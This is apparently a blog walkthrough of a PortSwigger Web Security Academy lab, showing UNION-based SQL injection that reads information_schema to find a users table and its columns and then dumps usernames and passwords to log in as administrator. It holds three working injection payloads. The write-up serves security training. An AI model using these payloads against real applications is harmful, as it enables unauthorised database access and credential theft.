Hello World, and welcome to HaXeZ where today we’re looking at PortSwigger Web Security Academy: SQL injection 7. This lab requires you to query the information schema to get the table name, and column names and then perform a UNION injection to get the administration username and password.
SQL injection attack, listing the database contents on non-Oracle databases
So as mentioned above, this lab requires some logical thinking when structuring your query. First, you need to query the information schema to find out what tables there are. Then you need to query it again to find out what columns are in a particular table. Finally, you have to modify your attack to query the specific table to return the contents of the specified columns.
The Application
Navigating to the application we can see it is laid out like the rest of them with the navigation menu at the top and the list of products underneath. In order to capture a request, we need to turn the intruder on in Burp Suite and click on the navigation URLs to capture it.
Querying The Database Tables
With the request captured, we can perform our standard column enumeration to determine how many columns there are and which columns contain text. Once we have identified that there are two columns that both contain text, we can query the ‘information_schema‘ table so that it returns the names of all other tables in the database.
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
Querying The Table Columns
Now that we know the names of the tables, we can identify which tables might be interesting. Looking at the results we can see that there is a table called ‘users_odzpcz‘. This table will likely contain some juicy user credentials but in order to proceed, we need to know what columns are in that table. The image below shows the result of the query where we’re asking for the column names.
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_odzpcz'--
Querying The Colum Data
Now that we have the column names, we can query the table directly and ask it to dump the contents of the two columns ‘password_nawvpk‘ and ‘username_bzubfy‘. I found that it was important to put the column names in the order that they appeared in the previous query. Otherwise, I just received a server error.
'+UNION+SELECT+password_nawvpk,+username_bzubfy+FROM+users_odzpcz--
The SQL Injection
With the SQL injection complete, all we need to do is look through the data and locate the administrator username and password. Once we have that information, we can head to the login page and use the credentials to log in and complete the lab.
